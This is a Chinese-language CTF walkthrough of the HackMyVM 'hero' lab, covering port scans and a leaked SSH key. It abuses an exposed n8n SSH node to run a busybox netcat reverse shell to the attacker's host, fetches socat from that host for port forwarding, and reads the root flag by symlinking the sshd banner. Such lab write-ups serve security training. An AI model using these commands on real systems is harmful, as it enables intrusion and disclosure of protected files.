guayu-kakeru
0%

HMV-hero

发表于 分类于

HMV-hero靶机复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.180
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-07 15:58 CST
Nmap scan report for 192.168.179.180 (192.168.179.180)
Host is up (0.0071s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE    SERVICE         VERSION
53/tcp   open     domain          dnsmasq 2.51
| dns-nsid: 
|_  bind.version: dnsmasq-2.51
8081/tcp filtered blackice-icecap
MAC Address: AE:01:4B:69:88:D3 (Unknown)
Device type: phone
Running: Google Android 10.X, Linux 4.X
OS CPE: cpe:/o:google:android:10 cpe:/o:linux:linux_kernel:4
OS details: Android 9 - 10 (Linux 4.9 - 4.14)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   7.15 ms 192.168.179.180 (192.168.179.180)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.09 seconds

信息收集

访问80端口得到ssh私钥 然后生成公钥 得到用户名

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.81
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----
┌──(root㉿kakeru)-[~/tmp]
└─# ssh-keygen -y -f tmp
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiYY31x+ZMvvHfmGWC7ZE75BbdbAKYEtIX75k6CL27C shawa@hero

接下来有硬控了我好久好久:
看大佬们用https://github.com/n8n-io/n8n中的ssh连接,我卡了很久。讲讲我的心路历程:
大家一起打靶机,然后发这个n8n的github地址和使用的界面,而且这个n8n还是一个工具,用法也是用docker打开,但是我从来没见过,这个靶机也没有开放22端口,我以为大佬们用这个工具来应对这种情况。而且我在本机运行这个服务的界面也是一模一样的。
使用方式是这样的:

在首页点击credentials然后add,点击添加,选择ssh私钥的选项,然后输入ip,用户名,私钥。
问题就来了:我始终连不上,看大佬们说用172.17.0.1,因为这个服务在docker上跑的(这里更加深了我的误解),但是我就是死活连不上,并且我一直相信是不是我的配置哪里出错了,然后就上网一直搜docker的配置,我连接不上的显示是端口拒绝连接,我也去docker内部发现没有ssh服务打开,然后整了半天,docker的内容也搜了半天,最后实在搞不下去了,就是连接不上。我就想着我自己能不能找到别的出路。
这时候我发现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -p- 192.168.179.81                             
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-07 21:31 CST
Nmap scan report for bogon (192.168.179.81)
Host is up (0.0017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
5678/tcp open  rrac
MAC Address: DE:86:60:02:F4:97 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

                                                                                                                    
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.81 -p 5678
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-07 21:32 CST
Nmap scan report for bogon (192.168.179.81)
Host is up (0.0034s latency).

PORT     STATE SERVICE VERSION
5678/tcp open  rrac?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=86400
|     Last-Modified: Fri, 07 Feb 2025 12:36:13 GMT
|     ETag: W/"7b7-194e0691fac"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 1975
|     Vary: Accept-Encoding
|     Date: Fri, 07 Feb 2025 13:32:19 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <script type="module" crossorigin src="/assets/polyfills-DfOJfMlf.js"></script>
|     <meta charset="utf-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
|     <meta name="viewport" content="width=device-width,initial-scale=1.0" />
|     <link rel="icon" href="/favicon.ico" />
|     <style>@media (prefers-color-scheme: dark) { body { background-color: rgb(45, 46, 46) } }</style>
|     <script type="text/javascript">
|     window.BASE_PATH = '/';
|     window.REST_ENDPOINT = 'rest';
|     </script>
|     <script src="/rest/sentry.js"></script>
|     <script>!function(t,e){var o,n,
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Vary: Accept-Encoding
|     Date: Fri, 07 Feb 2025 13:32:19 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5678-TCP:V=7.95%I=7%D=2/7%Time=67A60B63%P=aarch64-unknown-linux-gnu
SF:%r(GetRequest,8DC,"HTTP/1\.1\x20200\x20OK\r\nAccept-Ranges:\x20bytes\r\
SF:nCache-Control:\x20public,\x20max-age=86400\r\nLast-Modified:\x20Fri,\x
SF:2007\x20Feb\x202025\x2012:36:13\x20GMT\r\nETag:\x20W/\"7b7-194e0691fac\
SF:"\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2
SF:01975\r\nVary:\x20Accept-Encoding\r\nDate:\x20Fri,\x2007\x20Feb\x202025
SF:\x2013:32:19\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n
SF:<html\x20lang=\"en\">\n\t<head>\n\t\t<script\x20type=\"module\"\x20cros
SF:sorigin\x20src=\"/assets/polyfills-DfOJfMlf\.js\"></script>\n\n\t\t<met
SF:a\x20charset=\"utf-8\"\x20/>\n\t\t<meta\x20http-equiv=\"X-UA-Compatible
SF:\"\x20content=\"IE=edge\"\x20/>\n\t\t<meta\x20name=\"viewport\"\x20cont
SF:ent=\"width=device-width,initial-scale=1\.0\"\x20/>\n\t\t<link\x20rel=\
SF:"icon\"\x20href=\"/favicon\.ico\"\x20/>\n\t\t<style>@media\x20\(prefers
SF:-color-scheme:\x20dark\)\x20{\x20body\x20{\x20background-color:\x20rgb\
SF:(45,\x2046,\x2046\)\x20}\x20}</style>\n\t\t<script\x20type=\"text/javas
SF:cript\">\n\t\t\twindow\.BASE_PATH\x20=\x20'/';\n\t\t\twindow\.REST_ENDP
SF:OINT\x20=\x20'rest';\n\t\t</script>\n\t\t<script\x20src=\"/rest/sentry\
SF:.js\"></script>\n\t\t<script>!function\(t,e\){var\x20o,n,")%r(HTTPOptio
SF:ns,183,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x2
SF:0default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent
SF:-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nVary
SF::\x20Accept-Encoding\r\nDate:\x20Fri,\x2007\x20Feb\x202025\x2013:32:19\
SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang
SF:=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</
SF:head>\n<body>\n<pre>Cannot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%
SF:r(RTSPRequest,183,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security
SF:-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:143\r\nVary:\x20Accept-Encoding\r\nDate:\x20Fri,\x2007\x20Feb\x202025\x
SF:2013:32:19\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<h
SF:tml\x20lang=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error<
SF:/title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x20/</pre>\n</body>\n<
SF:/html>\n");
MAC Address: DE:86:60:02:F4:97 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   3.41 ms bogon (192.168.179.81)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds

我发现wc这不是藏了一个端口吗,而且还有http服务,我一访问,结果就是这个n8n
所以一直不是我的n8n配置啥的出问题了,因为这个是靶机的n8n!!!!
所以我就是看聊天记录就先入为主了,自己信息收集的还不完整,吃个教训了

然后按图中输入就可以连接成功了

接着去workflow中 配置下,第二个节点选ssh执行命令

双击这个ssh就可以进入执行命令了

但是直接用nc命令不行,提醒我们要用busybox , busybox就是整合了一系列linux工具的小集合
执行的命令为

1
busybox nc 192.168.179.11 1234 -e /bin/sh

成功拿到webshell

提权

现在的问题是这个shell不稳定,要得到一个稳定的shell
用群主的方法 利用socat转发端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

cd /tmp  
wget 192.168.179.11/socat
ls -al
total 372
drwxrwxrwt    4 root     root           100 Feb  7 14:56 .
drwxr-xr-x   21 root     root          4096 Feb  6 10:03 ..
drwxrwxrwt    2 root     root            40 Feb  7 12:35 .ICE-unix
drwxrwxrwt    2 root     root            40 Feb  7 12:35 .X11-unix
-rw-r--r--    1 shawa    shawa       375176 Feb  7 14:56 socat
chmod +x socat
./socat TCP-LISTEN:2222,fork TCP4:172.17.0.1:22 &
busybox netstat -lntup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 172.17.0.1:22           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      3105/socat
tcp        0      0 0.0.0.0:5678            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 :::5678                 :::*                    LISTEN      -
tcp        0      0 :::80                   :::*                    LISTEN      -

然后就可以用ssh和私钥连接了 拿到稳定shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kakeru)-[~/tmp]
└─# ssh shawa@192.168.179.81 -i tmp -p 2222
The authenticity of host '[192.168.179.81]:2222 ([192.168.179.81]:2222)' can't be established.
ED25519 key fingerprint is SHA256:EBZrmf2l6+BtffXHAEtSx6Suq5Wf09yzZlVqbQaGOVM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.179.81]:2222' (ED25519) to the list of known hosts.
shawa was here.
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

hero:~$

sudo 和 suid没有啥可以用上的

1
2
3
4
5
hero:~$ sudo -l
-sh: sudo: not found
hero:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/bbsuid
hero:~$

经过群里大佬们提醒,提权用ssh的banner找到sshd配置文件中的banner位置

1
2
# no default banner path
Banner /opt/banner.txt

做一个软链接

1
2
3
4
5
6
hero:/etc/ssh$ cd /opt
hero:/opt$ ls
banner.txt  containerd
hero:/opt$ rm banner.txt
hero:/opt$ ln -s /root/root.txt banner.txt
hero:/opt$

然后再ssh连接 就有flag了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kakeru)-[~/tmp]
└─# ssh shawa@192.168.179.81 -i tmp -p 2222
HMVNOTINPRODLOL
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

hero:~$